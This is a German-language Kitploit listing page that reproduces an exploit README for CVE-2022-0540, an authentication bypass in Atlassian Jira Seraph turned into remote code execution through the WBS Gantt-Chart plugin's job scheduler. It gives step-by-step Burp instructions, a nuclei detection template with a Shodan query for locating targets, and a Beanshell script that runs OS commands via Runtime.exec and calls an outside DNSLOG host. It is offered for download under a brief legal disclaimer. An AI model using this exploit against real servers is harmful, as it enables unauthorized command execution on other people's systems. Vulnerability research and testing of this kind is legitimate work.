Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-0540-RCE — Atlassian Jira Seraph Authentifizierungsumgehung RCE(CVE-2022-0540) | Kitploit
Tools/GitHubGitHub/pear1y/cve-2022-0540-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsAuthentifizierungPayload-Entwicklung
GitHubpear1y/cve-2022-0540-rce

CVE-2022-0540-RCE

Atlassian Jira Seraph Authentifizierungsumgehung RCE(CVE-2022-0540)

Repository anzeigen
71133vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Atlassian Jira Seraph Authentifizierungsumgehung RCE(CVE-2022-0540)

Englisch • 中文

Exploit-Details

Wie im Blog des Autors zu sehen, hat Atlassian eine lange Liste betroffener Plugins bereitgestellt (die überwiegende Mehrheit davon waren Fehlalarme), und der Autor hat mehrere tatsächlich betroffene Plugins aufgeführt.

image-20220525190523282

Gemäß den angegebenen Bedingungen, kombiniert mit der offiziellen Dokumentation für WBS Gantt-Chart for Jira

image-20220525190607569

Im Wesentlichen handelt es sich um eine RCE unter Verwendung des Beanshell-Skripts des Task-Moduls des Job-Schedulers. Die Exploit-Details sind wie folgt.

  1. Für den manuellen Betrieb ist es besser, die Ersetzungsfunktion von BurpSuite Proxy > Options > Match and Replace zu verwenden, um eine Regel zu bearbeiten.

image-20220525190640472

  1. Verwenden Sie Burp als Proxy, um auf die anfällige Jira-Software zuzugreifen. Öffnen Sie http://IP:PORT/secure/WBSGanttManageScheduleJobAction.jspa;. Dann können Sie die Job-Scheduler-Konfiguration überprüfen.

image-20220525190657966

Da unser endgültiges Beanshell-Skript als zeitgesteuerte Aufgabe ausgeführt wird, können Sie das Ausführungsintervall zu Ihrer Bequemlichkeit ändern, indem Sie auf "Edit" klicken und es im Cron-Format anpassen.

  1. Task erstellen

image-20220525190713512

  1. Task konfigurieren

image-20220525190728145

Nach Abschluss der Konfiguration klicken Sie auf "Update", aber es wird zur Login-Seite weitergeleitet. Keine Sorge, der Task wurde tatsächlich im Hintergrund hinzugefügt.

  1. Task aktivieren

image-20220525190740547

Der neu erstellte Task ist standardmäßig deaktiviert. Sie müssen ihn manuell auf "Enable" ändern und dann einige Sekunden warten, bis das Skript ausgeführt wird.

  1. DNSLOG-Aufzeichnung

image-20220525190756503

Gleichzeitig finden Sie im Job-Scheduler den Hinweis, dass die Ausführung abgeschlossen ist.

image-20220525190830668


Voraussetzungen

root@kitploit:~
WBS Gantt-Chart for Jira <= 9.14.3.1

Überprüfung der Ausnutzbarkeit

root@kitploit:~
id: CVE-2022-0540

info:
  name: Atlassian Jira Seraph - Authentication Bypass Verify Exploitable(CVE-2022-0540)
  author: DhiyaneshDK
  severity: critical
  description: |
    Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0540
    - https://confluence.atlassian.com/display/JIRA/Jira+Security+Advisory+2022-04-20
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-0540
    cwe-id: CWE-287
  metadata:
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2022,atlassian,jira,exposure,auth-bypass

requests:
  - method: GET
    path:
      - '{{BaseURL}}/secure/WBSGanttManageScheduleJobAction.jspa;'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WBS Gantt-Chart'

      - type: regex
        regex:
          - '<td headers="name">([.|\D]*?)</td>'
        dsl: []

      - type: status
        status:
          - 200

Ausführungsdemo

root@kitploit:~
nuclei -l targets.txt -t exploit.yaml

Screenshot

image-20220525173951955

Referenzen

https://blog.viettelcybersecurity.com/cve-2022-0540-authentication-bypass-in-seraph/

https://ricksoft-support.atlassian.net/wiki/spaces/WGCE0914/pages/2930802887/Global+job+scheduler+settings+-+aggregating+reflecting+time+tracking+and+calculating+progress+rate

Beanshell-Skript

root@kitploit:~
import java.io.IOException;
import java.lang.*;

Runtime runtime = Runtime.getRuntime();

try {

    String command = "ping -nc 1 55d2721a.dns.1433.eu.org";

    if (System.getProperty("os.name").toLowerCase().contains("windows")) {
    	runtime.exec(new String[]{"cmd.exe", "/c", command});
    } else {
    	runtime.exec(new String[]{"/bin/bash", "-c", command});
    }

} catch (IOException e) {
    e.printStackTrace();
}

Die in diesem Artikel genannten Informationen sind ausschließlich für legitime, autorisierte Penetrationstests, interne Sicherheitsprüfungen von Unternehmen und Forschungszwecke bestimmt. Der Benutzer ist für alle nachteiligen Folgen verantwortlich, die aus der Nutzung der in diesem Artikel bereitgestellten Informationen entstehen.

Tool herunterladen